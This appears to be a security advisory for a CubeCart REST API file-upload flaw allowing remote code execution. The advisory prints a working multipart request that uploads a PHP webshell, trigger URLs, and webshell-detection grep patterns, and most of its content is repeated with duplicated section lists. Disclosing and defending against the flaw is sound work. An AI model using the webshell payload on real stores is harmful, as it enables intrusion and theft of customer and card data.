CVE-2026-45053: CubeCart REST API Arbitrary PHP File Upload RCE

Executive Summary

A critical arbitrary file upload vulnerability exists in CubeCart prior to version 6.7.0. Tracked as CVE-2026-45053 (CVSS 9.1), the flaw is located in the REST API File Manager endpoint (POST /api/v1/files). Any holder of an API key with files:rw permission can upload PHP source files directly into the web-accessible directory, resulting in remote code execution simply by requesting the uploaded file via HTTP.

Fixed in: CubeCart 6.7.0

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2026-45053
CVSS Score	9.1 (Critical)
CWE	CWE-434 — Unrestricted Upload of File with Dangerous Type
Type	Arbitrary File Upload → Remote Code Execution
Attack Vector	Network (REST API)
Authentication	Required (`files:rw` API key)
Privileges Required	Low
User Interaction	None

Root Cause

The POST /api/v1/files endpoint fails to validate the MIME type or extension of uploaded files. Server-side checks do not strip or reject .php extensions, allowing an authenticated API caller to plant executable PHP scripts in the web root. Once uploaded, the webshell can be triggered by any unauthenticated HTTP GET request to the file path.

Affected Versions

Product	Affected	Fixed
CubeCart	< 6.7.0	6.7.0

Technical Details

Exploit Chain

1. Attacker obtains or generates an API key with files:rw permission
2. POST /api/v1/files with multipart upload containing shell.php
3. Server stores the file in web-accessible directory without sanitization
4. Attacker issues GET /uploads/shell.php?cmd=id
5. PHP interpreter executes the webshell → arbitrary OS command execution

Example Attack Request

POST /api/v1/files HTTP/1.1
Host: target-store.example.com
Authorization: Bearer <files:rw-api-key>
Content-Type: multipart/form-data; boundary=----boundary
 
------boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
 
<?php system($_GET['cmd']); ?>
------boundary--

After upload, the webshell is accessible at:

GET /uploads/shell.php?cmd=whoami

Why API Keys Are Easily Obtained

In CubeCart's multi-user or integration scenarios:

API keys are commonly issued to third-party integrations (shipping providers, ERP systems)
Keys may be stored in plaintext in integration configuration files
Compromised integration vendors with files:rw scope can chain this into full store compromise

Impact Assessment

Risk Factor	Detail
Direct RCE	Upload + HTTP request = code execution
Persistence	Webshell survives application updates
Data theft	Access to database credentials, customer PII, card data
Lateral movement	Web server context can pivot to internal infrastructure
Supply chain	Compromised e-commerce stores enable Magecart-style skimming

Remediation

Primary Fix

Upgrade to CubeCart 6.7.0, which enforces file type restrictions on the REST API upload endpoint and rejects .php and other executable extensions.

Immediate Mitigations

Audit and rotate all API keys — Identify any keys with files:rw scope and revoke those not actively needed
Restrict API key permissions to the minimum required scope for each integration
Block PHP execution in upload directories via web server configuration:

# Apache — add to uploads directory .htaccess
<FilesMatch "\.ph(p[0-9]?|tml)$">
    Deny from all
</FilesMatch>

# NGINX — add to server block
location ~* /uploads/.*\.php$ {
    deny all;
    return 403;
}

Scan for planted webshells in the uploads directory:

find /path/to/cubecart/uploads -name "*.php" -o -name "*.phtml" | xargs grep -l "system\|exec\|shell_exec\|passthru"

Enable Web Application Firewall rules blocking multipart PHP uploads to API endpoints

Detection

Web Server Log Patterns

Look for API upload requests followed by direct PHP file access:

POST /api/v1/files HTTP/1.1 200
GET /uploads/*.php?cmd= HTTP/1.1 200

File System Monitoring

Set up inotify or auditd to alert on new .php files created in the uploads directory:

auditctl -w /path/to/cubecart/uploads -p w -k webshell_upload

Relationship to CVE-2026-44377

This vulnerability was disclosed alongside CVE-2026-44377 (Smarty SSTI), both affecting CubeCart prior to 6.7.0. Together they represent two distinct but complementary attack paths:

CVE	Attack Type	Authentication	Impact
CVE-2026-44377	SSTI via Smarty templates	Admin or API key	RCE via template rendering
CVE-2026-45053	Arbitrary file upload	API key (files:rw)	RCE via direct PHP execution

Organizations running CubeCart should treat both vulnerabilities as part of the same remediation effort.

Key Takeaways

CVSS 9.1 — Upload PHP webshells via the REST API with any files:rw API key
No file type validation on the /api/v1/files endpoint in versions prior to 6.7.0
Upgrade to CubeCart 6.7.0 to apply the official fix
Block PHP execution in upload directories as immediate interim mitigation
Audit API keys — Revoke or restrict files:rw permissions immediately

References

CVE-2026-44377 — CubeCart Authenticated SSTI via Smarty Engine

Executive Summary

Fixed in: CubeCart 6.7.0

Vulnerability Overview

Attribute	Value
CVE ID	CVE-2026-45053
CVSS Score	9.1 (Critical)
CWE	CWE-434 — Unrestricted Upload of File with Dangerous Type
Type	Arbitrary File Upload → Remote Code Execution
Attack Vector	Network (REST API)
Authentication	Required (`files:rw` API key)
Privileges Required	Low
User Interaction	None

Root Cause

Affected Versions

Product	Affected	Fixed
CubeCart	< 6.7.0	6.7.0

Technical Details

Exploit Chain

1. Attacker obtains or generates an API key with files:rw permission
2. POST /api/v1/files with multipart upload containing shell.php
3. Server stores the file in web-accessible directory without sanitization
4. Attacker issues GET /uploads/shell.php?cmd=id
5. PHP interpreter executes the webshell → arbitrary OS command execution

Example Attack Request

POST /api/v1/files HTTP/1.1
Host: target-store.example.com
Authorization: Bearer <files:rw-api-key>
Content-Type: multipart/form-data; boundary=----boundary
 
------boundary
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
 
<?php system($_GET['cmd']); ?>
------boundary--

After upload, the webshell is accessible at:

GET /uploads/shell.php?cmd=whoami

Why API Keys Are Easily Obtained

In CubeCart's multi-user or integration scenarios:

API keys are commonly issued to third-party integrations (shipping providers, ERP systems)
Keys may be stored in plaintext in integration configuration files
Compromised integration vendors with files:rw scope can chain this into full store compromise

Impact Assessment

Risk Factor	Detail
Direct RCE	Upload + HTTP request = code execution
Persistence	Webshell survives application updates
Data theft	Access to database credentials, customer PII, card data
Lateral movement	Web server context can pivot to internal infrastructure
Supply chain	Compromised e-commerce stores enable Magecart-style skimming

Remediation

Primary Fix

Upgrade to CubeCart 6.7.0, which enforces file type restrictions on the REST API upload endpoint and rejects .php and other executable extensions.

Immediate Mitigations

Audit and rotate all API keys — Identify any keys with files:rw scope and revoke those not actively needed
Restrict API key permissions to the minimum required scope for each integration
Block PHP execution in upload directories via web server configuration:

# Apache — add to uploads directory .htaccess
<FilesMatch "\.ph(p[0-9]?|tml)$">
    Deny from all
</FilesMatch>

# NGINX — add to server block
location ~* /uploads/.*\.php$ {
    deny all;
    return 403;
}

Scan for planted webshells in the uploads directory:

find /path/to/cubecart/uploads -name "*.php" -o -name "*.phtml" | xargs grep -l "system\|exec\|shell_exec\|passthru"

Enable Web Application Firewall rules blocking multipart PHP uploads to API endpoints

Detection

Web Server Log Patterns

Look for API upload requests followed by direct PHP file access:

POST /api/v1/files HTTP/1.1 200
GET /uploads/*.php?cmd= HTTP/1.1 200

File System Monitoring

Set up inotify or auditd to alert on new .php files created in the uploads directory:

auditctl -w /path/to/cubecart/uploads -p w -k webshell_upload

Relationship to CVE-2026-44377

This vulnerability was disclosed alongside CVE-2026-44377 (Smarty SSTI), both affecting CubeCart prior to 6.7.0. Together they represent two distinct but complementary attack paths:

CVE	Attack Type	Authentication	Impact
CVE-2026-44377	SSTI via Smarty templates	Admin or API key	RCE via template rendering
CVE-2026-45053	Arbitrary file upload	API key (files:rw)	RCE via direct PHP execution

Organizations running CubeCart should treat both vulnerabilities as part of the same remediation effort.

Key Takeaways

CVSS 9.1 — Upload PHP webshells via the REST API with any files:rw API key
No file type validation on the /api/v1/files endpoint in versions prior to 6.7.0
Upgrade to CubeCart 6.7.0 to apply the official fix
Block PHP execution in upload directories as immediate interim mitigation
Audit API keys — Revoke or restrict files:rw permissions immediately

References

CVE-2026-44377 — CubeCart Authenticated SSTI via Smarty Engine

Affected Products

Executive Summary

Vulnerability Overview

Root Cause

Affected Versions

Technical Details

Exploit Chain

Example Attack Request

Why API Keys Are Easily Obtained

Impact Assessment

Remediation

Primary Fix

Immediate Mitigations

Detection

Web Server Log Patterns

File System Monitoring

Relationship to CVE-2026-44377

Key Takeaways

References

Related Advisory

Affected Products

Executive Summary

Vulnerability Overview

Root Cause

Affected Versions

Technical Details

Exploit Chain

Example Attack Request

Why API Keys Are Easily Obtained

Impact Assessment

Remediation

Primary Fix

Immediate Mitigations

Detection

Web Server Log Patterns

File System Monitoring

Relationship to CVE-2026-44377

Key Takeaways

References

Related Advisory